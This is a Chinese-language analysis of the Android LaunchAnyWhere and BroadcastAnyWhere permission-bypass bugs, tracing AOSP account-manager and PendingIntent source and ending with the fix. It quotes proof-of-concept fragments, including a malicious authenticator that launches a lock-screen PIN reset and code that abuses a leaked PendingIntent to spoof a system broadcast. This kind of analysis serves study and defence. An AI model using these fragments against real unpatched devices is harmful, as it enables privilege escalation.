


  1. public void onCreate(Bundle savedInstanceState) {
  2. ......
        final Intent intent = new Intent(this, ChooseAccountActivity.class);
  3. if (accountTypes != null) {
  4. intent.putExtra(AccountPreferenceBase.ACCOUNT_TYPES_FILTER_KEY, accountTypes);
  5. }
  6. startActivityForResult(intent, CHOOSE_ACCOUNT_REQUEST);
  7. }


  1. public void onActivityResult(int requestCode, int resultCode, Intent data) {
  2. ......
  4. .......
  5. // Go to account setup screen. finish() is called inside mCallback.
  6. addAccount(data.getStringExtra(EXTRA_SELECTED_ACCOUNT));
  7. break;


  1. private void addAccount(String accountType) {
  2. ......
  3. mPendingIntent = PendingIntent.getBroadcast(this, 0, new Intent(), 0);
  4. addAccountOptions.putParcelable(KEY_CALLER_IDENTITY, mPendingIntent);
  5. addAccountOptions.putBoolean(EXTRA_HAS_MULTIPLE_USERS, Utils.hasMultipleUsers(this));
  6. AccountManager.get(this).addAccount(
  7. accountType,
  8. null, /* authTokenType */
  9. null, /* requiredFeatures */
  10. addAccountOptions,
  11. null,
  12. mCallback,
  13. null /* handler */);
  14. mAddAccountCalled = true;
  15. }

  注意new Intent()这是broadAnywhere bug的成因,下面还会仔细分析。看源码发现AddAccountSettings.addAccount的还是由AccountManager.addAccount来实现的。/frameworks/base/core/java/android/accounts/

  1. public AccountManagerFuture<Bundle> addAccount(final String accountType,
  2. ......

    if (addAccountOptions != null) {

return new AmsTask(activity, handler, callback) {

  1. public void doWork() throws RemoteException {
  2. mService.addAccount(mResponse, accountType, authTokenType,
  3. requiredFeatures, activity != null, optionsIn);
  4. }
  5. }.start();


  1. public void addAccount(final IAccountManagerResponse response, final String accountType,
  2. final String authTokenType, final String[] requiredFeatures,
  3. final boolean expectActivityLaunch, final Bundle optionsIn) {
  4. .......
  5. final Bundle options = (optionsIn == null) ? new Bundle() : optionsIn;
  6. ......
  7. try {
  8. new Session(accounts, response, accountType, expectActivityLaunch,
  9. true /* stripAuthTokenFromResult */) {
  10. @Override
  11. public void run() throws RemoteException {
  12. mAuthenticator.addAccount(this, mAccountType, authTokenType, requiredFeatures,
  13. options);
  14. }
  15. ......

   由mAuthenticator去启动addAccount代码来添加账户;那mAuthenticator为何物(这里偏题下,参考资料6来学习下在android中如何添加自己的账户系统;其实直接看retme的launchAnyWhere poc学习更快),这里用retme poc的代码来分析就是Authenticator,他继承自AbstractAccountAuthenticator。Authenticator.addAccount:

  1. public Bundle addAccount(AccountAuthenticatorResponse response, String accountType,
  2. String authTokenType, String[] requiredFeatures, Bundle options) {
  3. ......
  4. Intent intent = new Intent();
  5. // 重设锁屏pin
  6. intent.setComponent(new ComponentName(
  7. "",
  8. ""));
  9. intent.setAction(Intent.ACTION_RUN);
  10. intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
  11. intent.putExtra("confirm_credentials",false);
  12. bundle.putParcelable(AccountManager.KEY_INTENT, intent);
  13. return bundle;
  14. }


  1. private class Response extends IAccountManagerResponse.Stub {
  2. public void onResult(Bundle bundle) {
  3. Intent intent = bundle.getParcelable(KEY_INTENT);
  4. if (intent != null && mActivity != null) {
  5. // since the user provided an Activity we will silently start intents
  6. // that we see
  7. mActivity.startActivity(intent);
  8. // leave the Future running to wait for the real response to this request
  9. }
  10. .......







  1. mPendingIntent = PendingIntent.getBroadcast(this, 0, new Intent(), 0);


  1. public int send(int code, Intent intent, String resolvedType,
  2. IIntentReceiver finishedReceiver, String requiredPermission) {
  3. return sendInner(code, intent, resolvedType, finishedReceiver,
  4. requiredPermission, null, null, 0, 0, 0, null);
  5. }


  1. int sendInner(int code, Intent intent, String resolvedType,
  2. IIntentReceiver finishedReceiver, String requiredPermission,
  3. IBinder resultTo, String resultWho, int requestCode,
  4. int flagsMask, int flagsValues, Bundle options) {
  5. synchronized(owner) {
  6. ......
  7. Intent finalIntent = key.requestIntent != null
  8. ? new Intent(key.requestIntent) : new Intent();
  9. if (intent != null) {// 填充intent
  10. int changes = finalIntent.fillIn(intent, key.flags);
  11. if ((changes&Intent.FILL_IN_DATA) == 0) {
  12. resolvedType = key.requestResolvedType;
  13. }
  14. }
  15. ......
  16. case ActivityManager.INTENT_SENDER_BROADCAST:
  17. try {
  18. // If a completion callback has been requested, require
  19. // that the broadcast be delivered synchronously
  20. // 发生广播
  21. owner.broadcastIntentInPackage(key.packageName, uid,
  22. finalIntent, resolvedType,
  23. finishedReceiver, code, null, null,
  24. requiredPermission, (finishedReceiver != null), false, userId);
  25. sendFinish = false;
  26. } catch (RuntimeException e) {
  27. Slog.w(ActivityManagerService.TAG,
  28. "Unable to send startActivity intent", e);
  29. }
  30. break;
  31. ......


  1. public int fillIn(Intent other, int flags) {
  2. 6474 int changes = 0;
  3. 6475 if (other.mAction != null
  4. 6476 && (mAction == null || (flags&FILL_IN_ACTION) != 0)) {
  5. 6477 mAction = other.mAction;
  6. 6478 changes |= FILL_IN_ACTION;
  7. 6479 }
  8. 6480 if ((other.mData != null || other.mType != null)
  9. 6481 && ((mData == null && mType == null)
  10. 6482 || (flags&FILL_IN_DATA) != 0)) {
  11. 6483 mData = other.mData;
  12. 6484 mType = other.mType;
  13. 6485 changes |= FILL_IN_DATA;
  14. 6486 }
  15. 6487 if (other.mCategories != null
  16. 6488 && (mCategories == null || (flags&FILL_IN_CATEGORIES) != 0)) {
  17. 6489 if (other.mCategories != null) {
  18. 6490 mCategories = new ArraySet<String>(other.mCategories);
  19. 6491 }
  20. 6492 changes |= FILL_IN_CATEGORIES;
  21. 6493 }
  22. 6494 if (other.mPackage != null
  23. 6495 && (mPackage == null || (flags&FILL_IN_PACKAGE) != 0)) {
  24. 6496 // Only do this if mSelector is not set.
  25. 6497 if (mSelector == null) {
  26. 6498 mPackage = other.mPackage;
  27. 6499 changes |= FILL_IN_PACKAGE;
  28. 6500 }
  29. 6501 }
  30. 6502 // Selector is special: it can only be set if explicitly allowed,
  31. 6503 // for the same reason as the component name.
  32. 6504 if (other.mSelector != null && (flags&FILL_IN_SELECTOR) != 0) {
  33. 6505 if (mPackage == null) {
  34. 6506 mSelector = new Intent(other.mSelector);
  35. 6507 mPackage = null;
  36. 6508 changes |= FILL_IN_SELECTOR;
  37. 6509 }
  38. 6510 }
  39. 6511 if (other.mClipData != null
  40. 6512 && (mClipData == null || (flags&FILL_IN_CLIP_DATA) != 0)) {
  41. 6513 mClipData = other.mClipData;
  42. 6514 changes |= FILL_IN_CLIP_DATA;
  43. 6515 }
  44. 6516 // Component is special: it can -only- be set if explicitly allowed,
  45. 6517 // since otherwise the sender could force the intent somewhere the
  46. 6518 // originator didn't intend.
  47. 6519 if (other.mComponent != null && (flags&FILL_IN_COMPONENT) != 0) {
  48. 6520 mComponent = other.mComponent;
  49. 6521 changes |= FILL_IN_COMPONENT;
  50. 6522 }
  51. 6523 mFlags |= other.mFlags;
  52. 6524 if (other.mSourceBounds != null
  53. 6525 && (mSourceBounds == null || (flags&FILL_IN_SOURCE_BOUNDS) != 0)) {
  54. 6526 mSourceBounds = new Rect(other.mSourceBounds);
  55. 6527 changes |= FILL_IN_SOURCE_BOUNDS;
  56. 6528 }
  57. 6529 if (mExtras == null) {
  58. 6530 if (other.mExtras != null) {
  59. 6531 mExtras = new Bundle(other.mExtras);
  60. 6532 }
  61. 6533 } else if (other.mExtras != null) {
  62. 6534 try {
  63. 6535 Bundle newb = new Bundle(other.mExtras);
  64. 6536 newb.putAll(mExtras);
  65. 6537 mExtras = newb;
  66. 6538 } catch (RuntimeException e) {
  67. 6539 // Modifying the extras can cause us to unparcel the contents
  68. 6540 // of the bundle, and if we do this in the system process that
  69. 6541 // may fail. We really should handle this (i.e., the Bundle
  70. 6542 // impl shouldn't be on top of a plain map), but for now just
  71. 6543 // ignore it and keep the original contents. :(
  72. 6544 Log.w("Intent", "Failure filling in extras", e);
  73. 6545 }
  74. 6546 }
  75. 6547 return changes;
  76. 6548 }


  1. // the exploit of broadcastAnyWhere
  2. final String KEY_CALLER_IDENTITY = "pendingIntent";
  3. PendingIntent pendingintent = options.getParcelable(KEY_CALLER_IDENTITY);
  4. Intent intent_for_broadcast = new Intent("android.intent.action.BOOT_COMPLETED");
  5. intent_for_broadcast.putExtra("info", "I am bad boy");
  7. try {
  8. pendingintent.send(mContext, 0, intent_for_broadcast);
  9. } catch (CanceledException e) {
  10. e.printStackTrace();
  11. }


  1. Intent identityIntent = new Intent();
  2. identityIntent.setComponent(new ComponentName(SHOULD_NOT_RESOLVE, SHOULD_NOT_RESOLVE));
  3. identityIntent.setAction(SHOULD_NOT_RESOLVE);
  4. identityIntent.addCategory(SHOULD_NOT_RESOLVE);


1、launchAnyWhere: Activity组件权限绕过漏洞解析(Google Bug 7699048 )

2、broadAnywhere:Broadcast组件权限绕过漏洞(Bug: 17356824)

3、Android LaunchAnyWhere (Google Bug 7699048)漏洞详解及防御措施

4、Android BroadcastAnyWhere(Google Bug 17356824)漏洞详细分析

5、安卓Bug 17356824 BroadcastAnywhere漏洞分析

6、一步一步教你在 Android 里创建自己的账户系统(一)



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